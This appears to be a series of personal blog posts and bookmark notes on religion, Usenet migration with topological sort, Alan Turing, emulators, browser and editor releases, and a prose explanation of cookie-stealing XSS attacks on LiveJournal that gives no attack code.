The Punchtape Letters

"My Dear Malware,

Thank you for your latest news. I agree that your bombarding of on-line programming sites with questions about “cascading style sheets” (whatever they may be) and “rounded corners” (as if anyone cared) will irritate and annoy a certain number (possibly even a large number) of programmers, but it seems a lot of effort to go to."
(tags: funny programming computers c.s.-lewis parody screwtape c++)

Creating God in one’s own image

Research in the psychology of religion shows that people tend to think God thinks what they think: "People may use religious agents as a moral compass, forming impressions and making decisions based on what they presume God as the ultimate moral authority would believe or want. The central feature of a compass, however, is that it points north no matter what direction a person is facing. This research suggests that, unlike an actual compass, inferences about God's beliefs may instead point people further in whatever direction they are already facing."
(tags: religion psychology science politics god morality)

Atheism: Proving The Negative: Encyclopedia Entry: Atheism

Matt McCormick's draft of an encyclopedia entry on various arguments for and against atheism.
(tags: atheism religion matt-mccormick theodicy design kalam)

In the Pipeline: Things I Won’t Work With

Derek Lowe, a medicinal chemist, has a section of his blog on the subject of really nasty chemicals. Light hearted yet terrifying.
(tags: science funny humour smell chemistry dangerous explosives)

Troy Jollimore on Karen Armstrong’s ‘The Case for God’ – Book Review

"Armstrong may perhaps make a plausible claim in asserting that faith, as understood by mainstream religious traditions before the advent of modernity, involved more than “mere” belief in the modern sense; but if the problem with religious life is that it encourages false, absurd, unjustified beliefs, showing that it does other things as well is not sufficient."
(tags: religion philosophy atheism karen-armstrong apophatic christianity)

The site of the book of the sites, The Internet, now in handy book form, is good fun. Crackbook and Poormatch are particularly well observed. It reminded me of TV Go Home, but a little less bitter and scatological (only a little, mind you).

Quotable quotes of the week:

“… any time anyone’s said anything comprehensible about the Trinity the Church has declared it a heresy.” – gjm11 on a Rilstone post created specifically for him.

“The universe tends toward maximum irony. Don’t push it.” – jwz on taking reliable backups (which is much harder on a Mac than it ought to be).

“All those fine words about the rule of law safeguarding our liberties, the arbitrary exercise of power and Bunker Hill, Lexington and Normandy went right out the window on 9/11. That was when Henry and the rest of his stalwart defenders of the rule of law promptly wet their pants and then let their president use the constitution to clean up the puddle.” – Digby, via a friend of a friend.

There’s an option that I might have considered instead of apostasy. Unfortunately, in those conservative days, you couldn’t really do that sort of thing. These days, if LiveJournal is anything to go by, it’s all the rage. A woman tells us how she’s in an open relationship with Jesus.

This is an article about the sort of thing I spend my days doing. Usually, I can’t talk about that, for reasons of commercial confidentiality, however, this particular case is completely unrelated to anything my employer sells, so I should be OK. I’ve tried to explain things sufficiently well that someone non-technical can get it. Hopefully it’s not too dull or incomprehensible.

First, we need some technical background…

The Naming of the Parts

A graph is a bunch of things connected by lines. The CDC Snog Graph is an example of what I mean. The things (representing people, in this case) are known as vertices or nodes, and the lines (representing joyous sharing experiences of some sort, in this case) are known as edges.

The lines on the Snog Graph don’t have a direction, so we call it an undirected graph. If you add a direction to each edge, you get a directed graph, which we can represent by putting arrows on the lines. Friendship on Facebook can be represented as an undirected graph (where the nodes are people and the edges mean “is friends with”), because all friendships are mutual, but LiveJournal friendships need a directed graph to represent them, since I can be your friend without you being mine, and vice versa.

A graph is cyclic if there’s a way to walk along edges starting at one node (following the arrows if the edges are directed) and get back to that node again without walking the same edge more than once. The Snog Graph is cyclic, as is the graph of friendships on a Facebook or LJ (trivially so on LJ, where it’s possible to friend yourself. Regular dancers might consider how this applies to their graph, vis-a-vis people who consider avoiding other dancers an optional extra). Graphs where you cannot do this are called acyclic.

Usenet news: you tell kids today that, and they don’t believe you

Usenet is an electronic discussion system which pre-dates all this newfangled World Wide Web nonsense. It distributes messages which are known as articles. It has some desirable features that web-based discussion forums often lack, like comment threading and remembering what you’ve already read. These days, people think Usenet is owned by Google, but in fact it’s a distributed system, with no central server (another advantage over LJ). When you want to talk to Usenet without using Google, you run a client program on your own machine, which talks to your local server. Your local server forwards your article to servers it knows about, which then forward it to servers they know about, and so on (the path of an article through the servers forms a directed acyclic graph, in fact). When you want to read other people’s articles, your client program fetches them from your local server.

Each article is posted to one or more groups, which are like communities on LJ. Note that, unlike LJ, the same article can be posted to more than one group without having to cut and paste it: the same article exists in each group it is cross-posted to.

On each server, articles have a number within each group. The first article to arrive in a group has number 1, the second article number 2, and so on. Cross-posted articles have more than one number, one for each group the article appears in.

Article numbers differ between servers, because the order of arrival depends on the path the article has taken to reach the server, but since your client program only talks to your local Usenet server, it usually refers to articles by their number (there’s also a unique string of letters and numbers which identifies the article, which is how servers know which ones they’ve seen already, but that’s not important right now). Remembering which articles you have read is then just a matter of storing some ranges of numbers for each group (so your client might remember that you have read articles 1-100,243-299 and 342-400, say).

The problem

We wanted to de-commission a Usenet server and move its articles to another server. The servers run different and incompatible software, so the most obvious way to get articles from one server to another is to post them like a client or another server would.

The new server is supposed to be a drop-in replacement for the old one, so we can’t change the numbers or the existing client programs will get confused and think you’ve read articles you haven’t, or vice versa. So you can’t just grab all the articles from the old server any old how and post them to the new one, because they’ll be jumbled up. Unfortunately, the old server has no way of directly telling us the precise order that articles arrived in, though it will tell us article numbers within each group.

“Aha!”, we think. Since the order of arrival matters, we’ll grab the articles in order from one group on the old server, post them in that order on the new server, and move on to the next group, where we’ll do the same, and so on until we’ve done all the groups.

This idea is ruined by cross-posts, because they have more than one article number associated with them. If a cross-posted article is number 10 in one group and number 3 in another, you’d better post the first 9 articles to the first group, the first 2 to the second group, and then you can make the cross-post. But maybe there’s a cross-post to a third group in those 9 articles, so you’ll need to get that group up to date before you can post one of those. How do you work out what order to post the articles in?

Obscure Unix tools to the rescue

You might have guessed that the wibbling about graphs wasn’t entirely tangential to all this. You can draw a graph of the problem. Each article is a node. For each group, connect each article to the one with the next number up by a directed edge (in this case, the direction of the arrow means “must be posted before”). You’ve drawn yourself a directed acyclic (since the article numbers only increase) graph. The cross-posted articles are then nodes with more than one edge coming into them.

One of the wizards at work realised this, and also pointed out that there’s a standard Unix tool for converting such graphs into a list of nodes whose order preserves the order implied by the arrows, a procedure which is known as a topological sort. The tool’s called tsort. From there, it’s just a matter of representing each article in the way tsort understands. When you do that, tsort gives you an order in which you can post the articles from the old server to the new server so they’ll be given the same numbers on the new server as they had on the old one.

In which I’m not as knowledgeable as the wizards

The way I thought of to do it was to write my own program. You pick a group, and start trying to post articles from the old to the new server in article number order. If they’re not cross-posted, you just keep going. When you hit a cross-posted article, you switch to each group it is cross-posted to in turn, and try to post all the articles before the cross-post to each of those groups. If while you’re doing that, you hit another cross-post, you remember where you got up to and do exactly the same thing with the groups that second cross-post is posted to, and when you’ve done that, you switch back to the groups for the first cross-post. I had a working version of this at about the same time as someone pointed out that tsort does the job 🙂

(Aside for the techies: this can be done using recursion. It looks like this is pretty much equivalent to one of the ways of doing a topological sort, namely the depth-first search mentioned on the Wikipedia page).

So I learned about topological sorts by re-inventing one. Most of the problems I deal with aren’t in fact cases of well-known problems (although I would say that if I was merely bad at recognising the fact, wouldn’t I?), but when they are, recognising that can save a lot of time.

And that’s what I do when I’m not on holiday.

I recently finished Andrew Hodges’s Alan Turing: the Enigma. The book is a definitive account of Turing’s life and work. In some places I found the level of detail overwhelming, but in others I admired the way Hodges uses his obviously extensive research to evoke the places and people in Turing’s life. The book is well worth reading for the perspective it gives on Turing, something which is absent from other, purely technical, accounts of his work.

Hodges portrays Turing as a man ahead of time, conceiving of the Turing machine as a thought experiment before the invention of the general purpose electronic computer, and inventing the Turing test when computing was in its infancy. Turing’s naivete was reflected in his refusal to accept what other people said could be done, but also in a lack of interest in the politics of his post-war work on computers and of his own homosexuality. A proto-geek, Turing was prickly, odd, and seemed to expect that the facts alone, when shown to people, would lead them to the same conclusions as he found.

Turing’s suicide is placed in the context of a move from regarding homosexuality as criminal to regarding it as a medical problem, and an increasing suspicion of homosexuals in classified government work. Hodges seems to conclude that Turing felt he had nowhere else to go.

You can’t help but wonder what else Turing might have accomplished had he not committed suicide. Greg Egan’s short, Oracle, is an entertaining what-if story, which also features a character very obviously based on C.S. Lewis. What if Turing had received help from a friend? It’s a pity that in reality there was no-one to lead him out of his cage.

Some of you might have played with emulators which let your PC pretend to be the classic computers of your youth (the BBC Micro, Acorn Electron, Commodore 64 and so on). The emulators work by simulating the processors in those machines on your PC, so you end up with Chuckie Egg running on a virtual BBC Micro running on a PC running on whatever the underlying physics of the universe happen to be.

robhu found a puzzle based on a similar idea. The International Conference on Functional Programming have an annual contest. Last year’s was particularly fun:

In 1967, during excavation for the construction of a new shopping center in Monroeville, Pennsylvania, workers uncovered a vault containing a cache of ancient scrolls. Most were severely damaged, but those that could be recovered confirmed the existence of a secret society long suspected to have been active in the region around the year 200 BC… Among the documents found intact in the Monroeville collection was a lengthy codex, written in no known language and inscribed with superhuman precision.

You’re given the codex, and the specification for a processor used by the Cult of the Bound Variable. Once you’ve written an emulator for that processor, you’re off (unless, like me, you write the emulator in a few hours and spend half a day corrupting the files from the contest website with your editor and wondering why it isn’t working). There’s an ancient Unix system, complete with ancient spam, and various puzzles which I’ve not had a chance to look at yet.

According to reports on the contest, lots of people tried to write the emulator in high level languages where it ran like treacle. A C implementation like mine (which may count as a spoiler for people who want to do it themselves) without any namby-pamby array bounds checking nonsense works fast enough that you can’t tell you’re not talking to a real ancient Unix system. There’s life in the C language yet.

I’m lost in admiration for the people who produced the codex. It required writing a compiler backend targeting the fictional processor, and implementing various other languages on top of that, as well as coming up with the puzzles. I’m not sure how far I’ll get with the puzzles before my ability or patience expires, as I’m a hacker rather than a computer scientist, but still, the thing is amazingly cool. It’s a time sink for geeks, so I pass it on to those of you who, like me, will waste many days on it. Have fun.

I am currently laid up. I’ve been trying out Firefox 2.0. It looks quite good. On the Mac, it’s faster then 1.5 and doesn’t get bogged down when you leave it running for a long time (I tend to put the Powerbook into sleep rather than shutting it down). I’ve not tried it on Windows yet, as I use Mozex for editing Wiki entries at work, and that’s not been updated for 2.0. The essential extensions have been updated, though: AdBlock and Greasemonkey being the two I use the most. It’s always a shock to use someone else’s machine and find their intarweb has adverts. I mean, how quaint. And you need Greasemonkey for LJ New Comments, which the people on lj_nifty seemed to like, bless ’em.

I like the spelling checker for form entries, and the way that you can now have it save and restore sessions, move tabs around, and put a close tab button in the corner of each tab. The smart completion thingy for Google searches is quite nice, as is the way that sites can offer their own search plugins which Firefox picks up on and can then install automatically (you can tell the site offers a plugin when the little arrow in the search box glows blue: thanks to marnanel for pointing that one out). I like the way that it can be configured to add RSS feeds to Bloglines, too.

While I was enjoying all this web 2.0 excitement, I thought I’d try out It’s a site that lets you store your bookmarks externally, so you can find them on any computer, and also lets you tag them with keywords so you can find them again easily (which is my main reason for using it: my bookmarks were getting out of control). You can see my bookmarks here, and there’s also an RSS feed of them if you’d like to stalk me.

Dear Lazyweb

I’d like some sort of house server thingy. scribb1e and I both have laptops, so we’d like somewhere to back-up important stuff. scribb1e has read the Pragmatic Programmer book and would like to keep her life under version control, which I think means Subversion here (not quite as good as Perforce, but free). I have the vague idea that we could connect something to the stereo and play my extensive collection of mp3z through it. We’d like the box to be more or less silent and quite small.

Possible candidates include the Mac Mini and the NSLU2, affectionately known as the Slug. With the Slug, I’d buy a big external drive onto which I would put a proper Linux distribution, as described on the web page. You don’t seem to be able to buy small and quiet server boxes if you don’t want to mess around with ordering the bits and building them yourself, which I don’t.

The Mini’s standard disk size is a bit small, but other than that it certainly does everything we want. However, it’s somewhat pricey for a box we’re not going to use interactively. The Slug is a lot cheaper but will require me to resurrect my Linux-fu (and if I want sound output, get into the sort of horrific kernel nargery that made jwz buy a Mac). I could buy the Slug and some networked other audio output thingy as I’ve heard you can get those these days, but I’ve no experience with them.

This must be a fairly common thing in other geek households. What have the rest of you done?

A couple of shiny new bits of software have come out in the last few weeks. Both of them are at version 7, for some reason.

Inform 7

Inform 7 is the latest version of Inform, the language for creating interactive fiction. The interesting thing about it is that Inform 7 programs are written in a subset of English:

The wood-slatted crate is in the Gazebo. The crate is a container. Instead of taking the crate, say “It’s far too heavy to lift.”

Inform is not capable of understanding arbitrary written English, but has a set of sentence forms it understands, and some inference rules built in (for example, if you tell it that “Mr Brown wears a hat”, it will infer that Mr Brown is a person).

scribb1e pointed out that this makes the work of writing the story similar to playing it. That could turn out to be a bad thing: most programming languages are so stylised and full of random punctuation symbols that programmers realise they’re not writing English and don’t try writing arbitrary English text in the hope of being understood by the computer. Even for people who understand Inform isn’t actually intelligent and that they have to write in Inform’s dialect to be understood, writing in something close to English will make it harder to remember to restrict their vocabulary. At worst, it could become a game of guess the verb, which would be painful (as opposed to a game of Guess The Verb, which I thought was fun, especially the Old Man River bit in the help).

However, unlike playing a game, looking at the excellent and witty online help doesn’t risk spoiling your fun. Since it’s all English, it’s easy to crib paragraphs of text from the examples and adapt them to your own works. Hopefully, writing the games in English will enable more people to create them without feeling that they have to be expert programmers. They’ll still have to think like a programmer, but won’t face the intimidating prospect of curly brackets.

Inform 7 itself isn’t just the compiler, it’s is a complete suite of tools for writing, testing and releasing interactive fiction, the IF equivalent of an Integrated Development Environment. It’s rather nice (although not yet available for anything other than Windows and Mac OS, because of the difficulty of getting the graphical stuff going on a variety of platforms).

Vim 7

I use the Vim editor, which is the old Unix vi with all the features you want from a modern programmer’s editor bolted on. New in Vim 7 there’s a spelling checker, “IntellisenseTM” style context-sensitive completion of names in code, and tabbed windows (no software is complete without tabbed windows these days).

The completion stuff is particularly useful, as it now pops up a menu of possible completions which you can select from with the cursor keys, and appears to be trying harder to find completions from nearby files in the background as you’re typing (I’ve not quite worked out what it’s doing yet, it’s reaching the stage where it’s just magic). Completion isn’t just for programmers, of course: when I’m typing an email, if I find myself using the same, long, word more than once, typing the initial letters and then letting Vim complete it is a boon.

The recent change to LJ’s URL formats seems to be part of an attempt to defend against one or more attacks which allow the attacker to steal another LJ user’s credentials, gaining the ability to impersonate that user. The theft occurs when the victim visits a page on LiveJournal which contains some malicious Javascript inserted by the attacker (more technical details below for those that care).

What’s been happening?

Slashdot linked to an article with some more details on the attacks. This article includes details supplied by the Bantown group (who live at, a site you probably want to visit using lynx). Bantown have use these attacks to pwn LiveJournal quite comprehensively: the comments on the news entry contained comments from tens of different users with the same demand from Bantown. It’s likely that these users all had their credentials stolen by Bantown.

I found a comment quoting an explanation of the vulnerability in an entry on lj_dev, but that entry has now been deleted. The quoted explanation is about a vulnerability which only applies to browsers based on Mozilla (so, Mozilla, Firefox and Netscape). The Bantowners claim that this is not the vulnerability they were using, as they have a vulnerability which affects all browsers. LJ recently patched a vulnerability which would do the job for all browsers, but it’s possible there are other, similar, vulnerabilities in LJ’s code. Or it’s possible that the Bantown people are lying.

Is it fixed?

LJ went down for a while on Friday afternoon, and seems to have invalidated all existing cookies. However, bradfitz is keeping quieter than I’d like about whether the risks still exist and about what workarounds users can use while LJ’s crack programmers are working on a fix. bradfitz‘s use of “soon” suggests that the URL change was part of further changes. These further changes aren’t in place as I write this, which I think means that it’s still possible to use whatever attack the Bantowners have been using to steal credentials, although it’s not possible for an attacker to use an old set of credentials from logins before this afternoon.

Edited: LJ has now fixed this, so it’s safe to turn Javascript on again.

What can we do about it?

For now, I’m running with No Script turned on, and using that to disable Javascript for all but trusted sites, of which LJ obviously isn’t one. LJ’s lack of communication about the risks to user data, and about possible workarounds, displays a worrying incompetence, as I’ve said elsewhere.

The Science Part

LJ uses cookies, small pieces of data stored by your web browser, as your credentials. When you log in to LJ, you get a cookie. From then on, your browser presents the cookie whenever it requests a page from LJ. LJ trusts you because you have the cookie, and lets you do things that only you should be able to do. The cookie can persist just until you close your browser, or longer if you’ve ticked the “remember me” option when you log in.

The attacks on LJ are cross-site scripting or XSS attacks. A Javascript running on a particular page can access the cookies for that page. Currently, any Javascript running on an LJ page can see your cookie, because the same cookie applies to the entire site. If an attacker can cause their own Javascript to run on a page supplied by LJ, they can steal that cookie and send it to a remote server that they own.

How might the attacker get their script onto LJ’s pages? Well, LJ lets you submit HTML as entries, comments, and as your own styles, and then displays it on its pages. LJ attempts to sanitise the HTML you supply it, but if it doesn’t do this correctly, the attacker has a way in. They can put their Javascript on the page, and visiting that page would then send your cookie to their server. Also, browsers based on Mozilla (such as Netscape and Firefox) allow stylesheet authors to embed Javascript in a CSS stylesheet, so the way LJ lets users reference their own external stylesheet is another security hole (although as I said above, it’s possibly not the one that the Bantown people are using).

There’s some more discussion of how this works (in amongst a lot of sarcasm) in this thread on jameth‘s journal.

The LJ New Comments script now copes better with the bewildering variety of journal styles that are out there. I also stopped it from giving up in disgust if a style allows it to see the comments but doesn’t provide a permanent link to each comment, as the “n” and “p” keys will still work in these styles (q.v. peacerose‘s journal, for example).

I’m now using scrollIntoView to move each new comment to the top as you click or press keys, so you don’t get a new history entry for each comment you visit (I was annoyed with having to hit the “Back” button multiple times to leave the entry). The docs for Greasemonkey allege that scrollIntoView doesn’t work within Greasemonkey unless you do special stuff, but I seem to be getting away with it. Possibly I’ve broken the script for people not using Firefox 1.5, but such people need to feel the white heat of technology, anyway.

Ph34r my sk1llz!

ETA: Except that I broke it again trying to make it handle all the extra ways of denoting comments. v0.4, now on the site, seems to be working.